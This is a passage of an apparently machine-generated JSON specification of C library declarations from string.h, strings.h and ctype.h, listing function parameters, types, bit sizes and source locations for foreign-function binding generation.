":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__s2", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__l", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "strxfrm_l", "ns": 0, "location": "/usr/include/string.h:159:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dest", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__l", "type": { "tag": "locale_t" } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "strdup", "ns": 0, "location": "/usr/include/string.h:166:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "strndup", "ns": 0, "location": "/usr/include/string.h:174:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__string", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "strchr", "ns": 0, "location": "/usr/include/string.h:225:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "strrchr", "ns": 0, "location": "/usr/include/string.h:252:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "strcspn", "ns": 0, "location": "/usr/include/string.h:272:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__reject", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "strspn", "ns": 0, "location": "/usr/include/string.h:276:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__accept", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "strpbrk", "ns": 0, "location": "/usr/include/string.h:302:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__accept", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "strstr", "ns": 0, "location": "/usr/include/string.h:329:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__haystack", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__needle", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "strtok", "ns": 0, "location": "/usr/include/string.h:335:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__delim", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "__strtok_r", "ns": 0, "location": "/usr/include/string.h:340:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__delim", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__save_ptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "strtok_r", "ns": 0, "location": "/usr/include/string.h:345:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__delim", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__save_ptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "strlen", "ns": 0, "location": "/usr/include/string.h:384:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "strnlen", "ns": 0, "location": "/usr/include/string.h:390:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__string", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__maxlen", "type": { "tag": "size_t" } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "strerror", "ns": 0, "location": "/usr/include/string.h:396:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__errnum", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "strerror_r", "ns": 0, "location": "/usr/include/string.h:409:12 <Spelling=/usr/include/string.h:409:28>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__errnum", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__buflen", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "strerror_l", "ns": 0, "location": "/usr/include/string.h:427:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__errnum", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__l", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "bcmp", "ns": 0, "location": "/usr/include/strings.h:34:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s1", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__s2", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "bcopy", "ns": 0, "location": "/usr/include/strings.h:38:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__dest", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "bzero", "ns": 0, "location": "/usr/include/strings.h:42:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "index", "ns": 0, "location": "/usr/include/strings.h:68:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "rindex", "ns": 0, "location": "/usr/include/strings.h:96:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "ffs", "ns": 0, "location": "/usr/include/strings.h:104:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__i", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ffsl", "ns": 0, "location": "/usr/include/strings.h:110:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__l", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ffsll", "ns": 0, "location": "/usr/include/strings.h:111:26", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ll", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "strcasecmp", "ns": 0, "location": "/usr/include/strings.h:116:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s1", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__s2", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "strncasecmp", "ns": 0, "location": "/usr/include/strings.h:120:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s1", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__s2", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "strcasecmp_l", "ns": 0, "location": "/usr/include/strings.h:128:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s1", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__s2", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__loc", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "strncasecmp_l", "ns": 0, "location": "/usr/include/strings.h:133:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s1", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__s2", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__loc", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "explicit_bzero", "ns": 0, "location": "/usr/include/string.h:435:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "strsep", "ns": 0, "location": "/usr/include/string.h:439:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__stringp", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__delim", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "strsignal", "ns": 0, "location": "/usr/include/string.h:446:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__sig", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "__stpcpy", "ns": 0, "location": "/usr/include/string.h:449:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dest", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "stpcpy", "ns": 0, "location": "/usr/include/string.h:451:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dest", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "__stpncpy", "ns": 0, "location": "/usr/include/string.h:456:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dest", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "stpncpy", "ns": 0, "location": "/usr/include/string.h:459:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dest", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "enum", "ns": 0, "name": "", "id": 41, "location": "/usr/include/ctype.h:46:1", "fields": [{ "tag": "field", "name": "_ISupper", "value": 256 }, { "tag": "field", "name": "_ISlower", "value": 512 }, { "tag": "field", "name": "_ISalpha", "value": 1024 }, { "tag": "field", "name": "_ISdigit", "value": 2048 }, { "tag": "field", "name": "_ISxdigit", "value": 4096 }, { "tag": "field", "name": "_ISspace", "value": 8192 }, { "tag": "field", "name": "_ISprint", "value": 16384 }, { "tag": "field", "name": "_ISgraph", "value": 32768 }, { "tag": "field", "name": "_ISblank", "value": 1 }, { "tag": "field", "name": "_IScntrl", "value": 2 }, { "tag": "field", "name": "_ISpunct", "value": 4 }, { "tag": "field", "name": "_ISalnum", "value": 8 }] }, { "tag": "function", "name": "__ctype_b_loc", "ns": 0, "location": "/usr/include/ctype.h:79:35", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } } } }, { "tag": "function", "name": "__ctype_tolower_loc", "ns": 0, "location": "/usr/include/ctype.h:81:26", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": "__int32_t" } } } }, { "tag": "function", "name": "__ctype_toupper_loc", "ns": 0, "location": "/usr/include/ctype.h:83:26", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": "__int32_t" } } } }, { "tag": "function", "name": "isalnum", "ns": 0, "location": "/usr/include/ctype.h:108:1 <Spelling=/usr/include/ctype.h:108:12>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isalpha", "ns": 0, "location": "/usr/include/ctype.h:109:1 <Spelling=/usr/include/ctype.h:109:12>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "iscntrl", "ns": 0, "location": "/usr/include/ctype.h:110:1 <Spelling=/usr/include/ctype.h:110:12>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isdigit", "ns": 0, "location": "/usr/include/ctype.h:111:1 <Spelling=/usr/include/ctype.h:111:12>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "islower", "ns": 0, "location": "/usr/include/ctype.h:112:1 <Spelling=/usr/include/ctype.h:112:12>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isgraph", "ns": 0, "location": "/usr/include/ctype.h:113:1 <Spelling=/usr/include/ctype.h:113:12>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isprint", "ns": 0, "location": "/usr/include/ctype.h:114:1 <Spelling=/usr/include/ctype.h:114:12>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ispunct", "ns": 0, "location": "/usr/include/ctype.h:115:1 <Spelling=/usr/include/ctype.h:115:12>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isspace", "ns": 0, "location": "/usr/include/ctype.h:116:1 <Spelling=/usr/include/ctype.h:116:12>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isupper", "ns": 0, "location": "/usr/include/ctype.h:117:1 <Spelling=/usr/include/ctype.h:117:12>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isxdigit", "ns": 0, "location": "/usr/include/ctype.h:118:1 <Spelling=/usr/include/ctype.h:118:12>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "tolower", "ns": 0, "location": "/usr/include/ctype.h:122:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "toupper", "ns": 0, "location": "/usr/include/ctype.h:125:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isblank", "ns": 0, "location": "/usr/include/ctype.h:130:1 <Spelling=/usr/include/ctype.h:130:12>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isascii", "ns": 0, "location": "/usr/include/ctype.h:142:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "toascii", "ns": 0, "location": "/usr/include/ctype.h:146:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_toupper", "ns": 0, "location": "/usr/include/ctype.h:150:1 <Spelling=/usr/include/ctype.h:150:12>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_tolower", "ns": 0, "location": "/usr/include/ctype.h:151:1 <Spelling=/usr/include/ctype.h:151:12>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isalnum_l", "ns": 0, "location": "/usr/include/ctype.h:251:1 <Spelling=/usr/include/ctype.h:251:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isalpha_l", "ns": 0, "location": "/usr/include/ctype.h:252:1 <Spelling=/usr/include/ctype.h:252:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "iscntrl_l", "ns": 0, "location": "/usr/include/ctype.h:253:1 <Spelling=/usr/include/ctype.h:253:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isdigit_l", "ns": 0, "location": "/usr/include/ctype.h:254:1 <Spelling=/usr/include/ctype.h:254:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "islower_l", "ns": 0, "location": "/usr/include/ctype.h:255:1 <Spelling=/usr/include/ctype.h:255:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isgraph_l", "ns": 0, "location": "/usr/include/ctype.h:256:1 <Spelling=/usr/include/ctype.h:256:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isprint_l", "ns": 0, "location": "/usr/include/ctype.h:257:1 <Spelling=/usr/include/ctype.h:257:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ispunct_l", "ns": 0, "location": "/usr/include/ctype.h:258:1 <Spelling=/usr/include/ctype.h:258:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isspace_l", "ns": 0, "location": "/usr/include/ctype.h:259:1 <Spelling=/usr/include/ctype.h:259:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isupper_l", "ns": 0, "location": "/usr/include/ctype.h:260:1 <Spelling=/usr/include/ctype.h:260:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isxdigit_l", "ns": 0, 